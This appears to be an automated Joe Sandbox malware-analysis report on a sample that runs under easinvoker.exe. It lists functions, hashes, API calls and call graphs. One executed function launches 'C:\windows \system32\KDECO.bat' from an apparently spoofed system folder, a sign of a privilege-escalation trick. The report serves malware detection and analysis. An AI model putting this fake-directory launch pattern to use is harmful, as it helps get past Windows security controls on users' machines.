                                                                                            • Associated: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e38000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e09af03244b7d80ff3675a4aa54c219e19cd5225935d86f53d1a3aabe8863fdc
                                                                                            • Instruction ID: 3fd9366a49d97435f2358a93c8301323ff4c155dfaff832744019cc59cf68e99
                                                                                            • Opcode Fuzzy Hash: e09af03244b7d80ff3675a4aa54c219e19cd5225935d86f53d1a3aabe8863fdc
                                                                                            • Instruction Fuzzy Hash: EC01D46284F3D06BEF469B38589058BBF44B913A4130BDAEBCC50CF8CFA355411BAB56
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E46814 Relevance: 7.8, Strings: 6, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.393365839.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E44000, based on PE: false
                                                                                            • Associated: 00000000.00000003.397821170.0000000004E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e44000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $0)@$7$<)@$D)@$L)@
                                                                                            • API String ID: 0-3088242726
                                                                                            • Opcode ID: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                                                                                            • Instruction ID: 883eb68dc3669dbaaa4f1f2bc7d289e55e3b0510509f9b36c0af82414f36d555
                                                                                            • Opcode Fuzzy Hash: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                                                                                            • Instruction Fuzzy Hash: 13A1F830B043548BEF219B3CD884BD8B7E4EB8A718F1460F5D5499B382DB7DA989CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E3E1E0 Relevance: 7.8, Strings: 6, Instructions: 254COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.390838352.0000000004E3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E3C000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e3c000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $0)@$7$<)@$D)@$L)@
                                                                                            • API String ID: 0-3088242726
                                                                                            • Opcode ID: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                                                                                            • Instruction ID: 00c954bdfb149f36a52cfe823259b2268c2662f0372fa9227046e3d76b9f3d33
                                                                                            • Opcode Fuzzy Hash: 8e42451d48a56f7ccbea89492fea16576adab606abf73f6db0535c3d2d26f603
                                                                                            • Instruction Fuzzy Hash: C5A1F830F042648BEB22AB2CCC88BD877E5EF09315F5461F5D449EB381DB79A985CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E36090 Relevance: 6.4, Strings: 5, Instructions: 155COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e34000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $0)@$<)@$D)@$L)@
                                                                                            • API String ID: 0-3013997273
                                                                                            • Opcode ID: 919faa8700f0759cb40d9b13d5309978be2770204ccdbc6cda5c8e8ee7111fc7
                                                                                            • Instruction ID: 6bbc8c49afa13a6743f393e040e3500e60fba56f1a62d2b7a2b07263698911cb
                                                                                            • Opcode Fuzzy Hash: 919faa8700f0759cb40d9b13d5309978be2770204ccdbc6cda5c8e8ee7111fc7
                                                                                            • Instruction Fuzzy Hash: F851DA20B043949FEB339B3CC8C8798BBE1EB09305F5465F5D089AB382DB759986CB15
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E35E86 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e34000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $0)@$7$L)@
                                                                                            • API String ID: 0-3436765255
                                                                                            • Opcode ID: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                                                                                            • Instruction ID: 24e7f13c0e8264041f873f48d60f570be45f5f8c7cfce6e174cce62bd1579353
                                                                                            • Opcode Fuzzy Hash: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                                                                                            • Instruction Fuzzy Hash: DB71C730B042589EEB329B3CC888BD8B7E5EB09319F1461E6E049EB382DB7559C5CB55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E46812 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.393365839.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E44000, based on PE: false
                                                                                            • Associated: 00000000.00000003.397821170.0000000004E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e44000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $0)@$7$L)@
                                                                                            • API String ID: 0-3436765255
                                                                                            • Opcode ID: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                                                                                            • Instruction ID: 079d88af71f993c8d088bff58eb70aec2ba0b8640d954c6981e49dd3a4f2188a
                                                                                            • Opcode Fuzzy Hash: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                                                                                            • Instruction Fuzzy Hash: 4471C530B042988FEF219B3CDC84BD8B7E4EB8A718F1060E5D58D9B281DB7969C5CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E3E1DE Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.390838352.0000000004E3C000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E3C000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e3c000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $0)@$7$L)@
                                                                                            • API String ID: 0-3436765255
                                                                                            • Opcode ID: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                                                                                            • Instruction ID: b47ce29c64687ebf25982b29b0b8a54a90a69f4364c10efe5a0aacc4361aa7ea
                                                                                            • Opcode Fuzzy Hash: 279b70a9cd7f3022531bf45402512d7d9342d9062b0a034600670c007807e5d4
                                                                                            • Instruction Fuzzy Hash: 5871A430F042A88EEB229B2CCC88BD8BBF5EB09715F5461E5D049DB281DB75A985CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04E35FC0 Relevance: 5.2, Strings: 4, Instructions: 156COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000003.390810761.0000000004E34000.00000004.00001000.00020000.00000000.sdmp, Offset: 04E34000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_3_4e34000_0vJrK0NCd1.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $0)@$7$L)@
                                                                                            • API String ID: 0-3436765255
                                                                                            • Opcode ID: 313d5caafd23ea4199ddc2a6333175292bcea86a71a46013c55989caa23a4a17
                                                                                            • Instruction ID: ff9bbc5e260703675cd8cffcfd433600d7d3a0df83b34d47fdb0be057691c077
                                                                                            • Opcode Fuzzy Hash: 313d5caafd23ea4199ddc2a6333175292bcea86a71a46013c55989caa23a4a17
                                                                                            • Instruction Fuzzy Hash: E851A630B042A49EEF329B3CC888BD8BBE5AB09305F5451E5D089AB382DB7559C6CB55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:12.3%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:6.6%
                                                                                            Total number of Nodes:122
                                                                                            Total number of Limit Nodes:2
                                                                                            execution_graph 737 7ff60e689b20 740 7ff60e689e54 737->740 741 7ff60e689b29 740->741 742 7ff60e689e80 6 API calls 740->742 742->741 644 613c1290 645 613c12af 644->645 646 613c12f0 644->646 649 613c16c0 6 API calls 645->649 650 613c12d6 645->650 671 613c16c0 646->671 648 613c12f5 651 613c12be 648->651 652 613c1305 648->652 649->651 653 613c147d 2 API calls 651->653 691 613c1050 652->691 655 613c12cb 653->655 655->650 659 613c1050 2 API calls 655->659 656 613c130a 656->650 657 613c1370 656->657 658 613c1353 656->658 660 613c1375 657->660 661 613c13c0 657->661 658->650 662 613c1050 2 API calls 658->662 659->650 697 613c1a60 660->697 663 613c147d 2 API calls 661->663 662->650 663->655 665 613c137a 702 613c147d 665->702 667 613c138a 667->650 668 613c147d 2 API calls 667->668 669 613c13a1 668->669 670 613c1050 2 API calls 669->670 670->655 672 613c16db 671->672 675 613c16f0 671->675 672->648 673 613c18a0 673->672 674 613c18a9 673->674 676 613c1550 4 API calls 674->676 679 613c18d8 674->679 675->672 675->673 677 613c178c 675->677 676->674 677->672 678 613c1911 677->678 680 613c18dd 677->680 683 613c1946 677->683 684 613c17e4 677->684 682 613c1550 4 API calls 678->682 681 613c1814 679->681 680->683 686 613c1550 4 API calls 680->686 681->672 687 613c1863 VirtualQuery 681->687 682->683 685 613c1550 4 API calls 683->685 684->677 684->681 684->683 706 613c1550 684->706 688 613c1989 685->688 686->678 687->672 690 613c187c VirtualProtect 687->690 688->672 690->681 692 613c1066 691->692 693 613c10e0 691->693 694 613c1094 Sleep 692->694 696 613c10a8 692->696 695 613c1119 Sleep 693->695 693->696 694->692 695->693 696->656 698 613c1a6a 697->698 699 613c1a00 697->699 698->665 715 613c2170 699->715 703 613c1496 702->703 705 613c14a5 702->705 722 613c1446 WinExec ExitProcess 703->722 705->667 707 613c1582 706->707 708 613c15e3 VirtualQuery 707->708 711 613c1685 707->711 709 613c1611 memcpy 708->709 708->711 712 613c16db 711->712 713 613c1863 VirtualQuery 711->713 712->684 713->712 714 613c187c VirtualProtect 713->714 714->711 716 613c2184 715->716 717 613c2205 716->717 720 613c28c0 _lock 716->720 717->665 721 613c927c 720->721 723 613c13e0 724 613c13f6 723->724 729 613c1a80 724->729 726 613c1413 733 613c1e10 726->733 730 613c1aa9 729->730 731 613c1ac0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 729->731 730->726 732 613c1b1d 731->732 732->726 735 613c1e1f 733->735 734 613c1418 735->734 736 613c1ee0 RtlAddFunctionTable 735->736 736->734 743 613c20f0 744 613c2102 743->744 746 613c2112 744->746 747 613c2780 744->747 748 613c2789 747->748 749 613c27d2 747->749 750 613c27a4 748->750 753 613c278b 748->753 751 613c27dc 749->751 752 613c27f0 InitializeCriticalSection 749->752 755 613c25f0 3 API calls 750->755 757 613c27ae 750->757 751->746 752->751 758 613c279a 753->758 759 613c25f0 EnterCriticalSection 753->759 754 613c27b9 DeleteCriticalSection 754->758 755->757 757->754 757->758 758->746 760 613c2644 759->760 762 613c2611 759->762 761 613c2620 TlsGetValue GetLastError 761->762 762->760 762->761 763 613c26e0 764 613c26ef 763->764 765 613c2700 EnterCriticalSection 763->765 766 613c2737 LeaveCriticalSection 765->766 769 613c271b 765->769 767 613c2744 766->767 768 613c2721 770 613c2760 LeaveCriticalSection 768->770 769->766 769->768 770->767 771 613c1b60 RtlCaptureContext RtlLookupFunctionEntry 772 613c1b9d RtlVirtualUnwind 771->772 773 613c1c40 771->773 774 613c1bd3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 772->774 773->774 774->773 775 613c2660 776 613c2680 775->776 777 613c2671 775->777 776->777 778 613c269c EnterCriticalSection LeaveCriticalSection 776->778 779 613c20c0 780 613c20c8 779->780 781 613c20cd 780->781 782 613c2780 5 API calls 780->782 783 613c20e5 782->783

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available
                                                                                            callgraph 0 Function_613C153D 1 Function_613D06BF 2 Function_613C28B9 3 Function_613C143B 4 Function_613C1430 5 Function_613C2530 29 Function_613C2280 5->29 73 Function_613C2240 5->73 6 Function_00007FF60E67C0B0 7 Function_00007FF60E67AD9C 8 Function_00007FF60E689B20 61 Function_00007FF60E689E54 8->61 9 Function_00007FF60E671418 10 Function_00007FF60E679218 11 Function_00007FF60E6747A4 12 Function_613C2820 13 Function_00007FF60E6792A1 14 Function_613CF021 15 Function_613CF39A 16 Function_00007FF60E679293 17 Function_613C1E10 19 Function_613C2490 17->19 27 Function_613C2400 17->27 65 Function_613C22D0 17->65 18 Function_613C1290 32 Function_613C147D 18->32 49 Function_613C2860 18->49 51 Function_613C1A60 18->51 63 Function_613C1050 18->63 72 Function_613C16C0 18->72 19->73 20 Function_613CF513 21 Function_00007FF60E67AD7C 22 Function_00007FF60E6791FC 23 Function_00007FF60E67AE04 24 Function_00007FF60E67D004 25 Function_613C1000 66 Function_613C14D0 25->66 26 Function_613C1F00 57 Function_613C25E0 26->57 27->73 28 Function_613CFD00 30 Function_613C2780 39 Function_613C25F0 30->39 31 Function_613C1A80 32->3 32->4 43 Function_613C1472 32->43 71 Function_613C1446 32->71 33 Function_613D0DFE 34 Function_00007FF60E67D6E8 35 Function_00007FF60E67B968 36 Function_613CF57A 37 Function_613C2370 37->73 38 Function_613C2170 38->66 74 Function_613C14C0 38->74 76 Function_613C28C0 38->76 40 Function_613C20F0 40->30 41 Function_00007FF60E6797F1 42 Function_00007FF60E67BAF1 44 Function_00007FF60E67796F 45 Function_00007FF60E67B65C 46 Function_00007FF60E679258 47 Function_00007FF60E67A3E4 48 Function_00007FF60E67AD64 50 Function_613C26E0 51->38 52 Function_613C1B60 53 Function_613C1C60 53->57 54 Function_613C2160 55 Function_613C2660 56 Function_613C13E0 56->17 56->31 58 Function_00007FF60E679260 59 Function_613C2262 60 Function_613D2162 62 Function_00007FF60E6741D4 63->74 64 Function_613C1550 64->12 64->19 64->37 64->64 75 Function_613C23C0 64->75 65->73 67 Function_613C24D0 67->29 67->73 68 Function_613D0CCD 69 Function_00007FF60E67C2BC 70 Function_613D0E4B 72->12 72->64 72->75 75->73 77 Function_613C20C0 77->30 78 Function_00007FF60E67BF40

                                                                                            Executed Functions

                                                                                            Function 613C1446 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 613c1446-613c1471 WinExec ExitProcess
                                                                                            APIs
                                                                                            • WinExec.KERNEL32(?,?,?,613C14A5), ref: 613C1461
                                                                                            • ExitProcess.KERNEL32(?,?,?,613C14A5), ref: 613C146F
                                                                                            Strings
                                                                                            • C:\windows \system32\KDECO.bat, xrefs: 613C1453
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                            • Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecExitProcess
                                                                                            • String ID: C:\windows \system32\KDECO.bat
                                                                                            • API String ID: 4112423671-3197246866
                                                                                            • Opcode ID: b3456a760db7434f8d5867fb47a99551f6fd8c56f163cafdbc40650464793521
                                                                                            • Instruction ID: 4c5d8cd5d910ffdc7edc5c81563eb71587e0c072eced2b6f5a338f6d84e390be
                                                                                            • Opcode Fuzzy Hash: b3456a760db7434f8d5867fb47a99551f6fd8c56f163cafdbc40650464793521
                                                                                            • Instruction Fuzzy Hash: 29D0123431192888FB00AB66FCA23D12322E794B40F5C0021C81E5B3B0CE2ACA228380
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 613C1E10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlAddFunctionTable.KERNEL32 ref: 613C1EEA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                            • Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd
                                                                                            Similarity
                                                                                            • API ID: FunctionTable
                                                                                            • String ID: .pdata
                                                                                            • API String ID: 1252446317-4177594709
                                                                                            • Opcode ID: 1a5f6c24201736e11f71e867ddcf66c4e02aca3fdeeedcbeef6722f7c10745f6
                                                                                            • Instruction ID: 9b48684eaa54373ac2d77e7686239314a7b50e7976879dfb6e5eb98d9026d313
                                                                                            • Opcode Fuzzy Hash: 1a5f6c24201736e11f71e867ddcf66c4e02aca3fdeeedcbeef6722f7c10745f6
                                                                                            • Instruction Fuzzy Hash: 0621D272702164CAFB058F69D9443947BB2A789F9CF4CC020CE0E97304EB36CA51DB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 613C1B60 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlCaptureContext.KERNEL32 ref: 613C1B74
                                                                                            • RtlLookupFunctionEntry.KERNEL32 ref: 613C1B8B
                                                                                            • RtlVirtualUnwind.KERNEL32 ref: 613C1BCD
                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 613C1C14
                                                                                            • UnhandledExceptionFilter.KERNEL32 ref: 613C1C21
                                                                                            • GetCurrentProcess.KERNEL32 ref: 613C1C27
                                                                                            • TerminateProcess.KERNEL32 ref: 613C1C35
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                            • Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtual
                                                                                            • String ID: @u<a
                                                                                            • API String ID: 3266983031-2704016811
                                                                                            • Opcode ID: 3fe8edf890545a3c8ca01450929e34242cb447bf27343d606198e146d2ccdf0e
                                                                                            • Instruction ID: f94ddf039621e221967baa8edb73e03f7702b5fa200f94eb725674a2b633c061
                                                                                            • Opcode Fuzzy Hash: 3fe8edf890545a3c8ca01450929e34242cb447bf27343d606198e146d2ccdf0e
                                                                                            • Instruction Fuzzy Hash: 0B21E375611B64C9EB008F62F8443C937B6BB48B98F495126DD8F27724EF3AC6248390
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 613C1A80 Relevance: 7.6, APIs: 5, Instructions: 57timethreadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 613C1AC5
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 613C1AD0
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 613C1AD8
                                                                                            • GetTickCount.KERNEL32 ref: 613C1AE0
                                                                                            • QueryPerformanceCounter.KERNEL32 ref: 613C1AED
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                            • Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                            • String ID:
                                                                                            • API String ID: 1445889803-0
                                                                                            • Opcode ID: 2ea03832c0dc0cb9eba84dc4ab77c4331fcba75045809e3b0057f4675091efb6
                                                                                            • Instruction ID: 414e8fcb770a865792631034dca2ba3ece076a107bf7b4a66efec48a9980259e
                                                                                            • Opcode Fuzzy Hash: 2ea03832c0dc0cb9eba84dc4ab77c4331fcba75045809e3b0057f4675091efb6
                                                                                            • Instruction Fuzzy Hash: DE11B233712A6082FB109B25F808385B261B788BE4F0C4235DD5F13BA4DA3DCA958340
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 613C1050 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 146sleepCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 88 613c1050-613c1064 89 613c1066-613c106e 88->89 90 613c10e0-613c10e8 88->90 91 613c1074-613c1092 89->91 92 613c1193-613c1195 89->92 93 613c10c9-613c10d5 90->93 94 613c10ea-613c1107 90->94 95 613c109b-613c10a6 91->95 92->93 96 613c1120-613c112b 94->96 99 613c10a8-613c10b4 95->99 100 613c1094-613c1099 Sleep 95->100 97 613c112d 96->97 98 613c1110-613c1113 96->98 101 613c112f-613c113b 97->101 104 613c1119-613c111e Sleep 98->104 105 613c1220-613c1225 98->105 102 613c10ba-613c10c4 call 613c2878 99->102 103 613c11a0-613c11b6 call 613c14c0 99->103 100->95 106 613c125e-613c1268 call 613c2878 101->106 107 613c1141-613c1145 101->107 102->93 119 613c11ff-613c121b 103->119 120 613c11b8-613c11c8 call 613c14c0 103->120 104->96 105->101 116 613c126d-613c1280 call 613c2888 106->116 111 613c114b-613c1150 107->111 112 613c1240-613c1259 call 613c2888 107->112 111->116 117 613c1156-613c1158 111->117 112->106 122 613c115e-613c116b 117->122 123 613c1230-613c1235 117->123 130 613c11cb-613c11d2 120->130 127 613c116d-613c1175 122->127 128 613c117a-613c1192 122->128 123->122 127->128 131 613c11d4-613c11da 130->131 132 613c11e7-613c11f7 call 613c2880 130->132 131->130 133 613c11dc-613c11e5 131->133 132->119 133->131 133->132
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.454957921.00000000613C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 613C0000, based on PE: true
                                                                                            • Associated: 00000016.00000002.454940555.00000000613C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454965705.00000000613C4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454974870.00000000613C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.454999565.00000000613C9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.455068342.00000000613CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_22_2_613c0000_easinvoker.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: @y<a$Hy<a$PA<a$Py<a$Xy<a
                                                                                            • API String ID: 3472027048-4231909830
                                                                                            • Opcode ID: 6a04c88ca713c1909bc590f0e4298c2beab8979a6fd2d427b8616973f60fcf11
                                                                                            • Instruction ID: fa2c0e70f73d20439f9ad63a0ffe88be5d3e49048c325fff2c4482aeb8ecd435
                                                                                            • Opcode Fuzzy Hash: 6a04c88ca713c1909bc590f0e4298c2beab8979a6fd2d427b8616973f60fcf11
                                                                                            • Instruction Fuzzy Hash: A041C136702624C9F7029B5AE95039527B6A784FDCF48C022DE0E97354DF3ACD91D352
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00007FF60E689E54 Relevance: 9.0, APIs: 6, Instructions: 47timethreadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            C-Code - Quality: 100%
                                                                                            			E00007FF67FF60E689E54(long long __rbx, signed long long _a16, long long _a32) {

				_a32 = __rbx;
				_a16 = _a16 & 0x00000000;
			}



                                                                                            0x7ff60e689e54
                                                                                            0x7ff60e689e68

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000016.00000002.455867364.00007FF60E671000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60E670000, based on PE: true
                                                                                            • Associated: 00000016.00000002.455839226.00007FF60E670000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.455918510.00007FF60E68C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000016.00000002.455928988.00007FF60E68D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_22_2_7ff60e670000_easinvoker.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 4104442557-0
                                                                                            • Opcode ID: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
                                                                                            • Instruction ID: ddc207f2111f5900a4dc08e1fecb9abf84cec6dbecea3f5c1538ac88474ce6e3
                                                                                            • Opcode Fuzzy Hash: a70ea0b59a2ae1b815e0bd9ab958c9e9749b377321f7a8ebfb09bb20146cbade
                                                                                            • Instruction Fuzzy Hash: 68111D32614F418AEB10CF64FC5816933A4F75A758F141A31FAAD86764DF7DD1A49340
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 613C16C0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 210memoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
